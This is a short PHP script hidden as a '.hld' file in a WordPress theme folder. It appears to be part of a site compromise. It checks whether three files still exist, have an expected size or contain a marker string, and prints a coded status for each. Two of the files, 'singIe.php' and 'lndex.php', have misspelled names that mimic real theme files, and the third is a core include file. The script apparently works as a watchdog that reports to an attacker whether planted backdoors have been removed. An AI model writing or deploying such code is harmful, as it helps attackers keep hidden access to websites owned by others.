File: /home/mmickelson/martyknows.com/wp-content/themes/home_1757661446/.hld
<?php $r = '/home/mmickelson/martyknows.com'; $x = ["/wp-includes/deprecated.php"=>"bd@@391233@@Large-Allocation",
"/wp-content/themes/custom-functions-1747917194/singIe.php"=>"bd@@226754@@731",
"/wp-content/themes/home_1757661446/lndex.php"=>"bd@@449218@@727"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');